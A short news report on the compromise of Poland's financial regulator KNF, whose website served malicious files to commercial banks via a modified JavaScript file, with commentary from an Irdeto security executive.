A wide-ranging hack is already being dubbed the worst cyberattack on the Polish banking industry.
The sector's own financial regulator, the Polish Financial Supervision Authority (KNF), was ironically the original source of the compromise. The regulator's servers were hosting malicious files that were then infecting banks' systems.
A spokesman for the KNF told the Register that its internal systems had been compromised by someone "from another country,” and that the KNF's entire system has been taken down "in order to secure evidence." So far, consumer bank balances have not been affected.
A number of banks found encrypted executables on several servers, according to BadCyber. Apparently, a modified Javascript file resulted in visitors to the regulator's site loading an external file that in turn pulled down malicious payloads. Many of the country’s roughly 20 commercial banks reported being impacted.
David Jones, global head of payments and banking at Irdeto, told us via email that the attack is yet another example of creative cybercriminals leveraging diverse technologies to seed and propagate an attack across multiple banks.
“As banking systems become more connected or share common access points (such as a regulatory body), it is important to recognize that standard network protocols are inadequate to prevent advanced cyberattacks,” he said. “Web apps/APIs and Javascript can be tampered with, and their data intersected. This is due to the environment supported by modern browsers and the inherent lack of security in the open internet.”
As a result, advanced security solutions should be considered for all apps/APIs that access and expose sensitive financial/private data, he added.
“Due to diversification of the cryptography, attackers are unable to weaponize attacks per user to impact a larger base,” he noted. “In the case of the Polish banks attack, enhanced app/API security working in parallel with robust network infrastructure policies could have prevented a breach—whose damage is still to be understood and quantified fully.”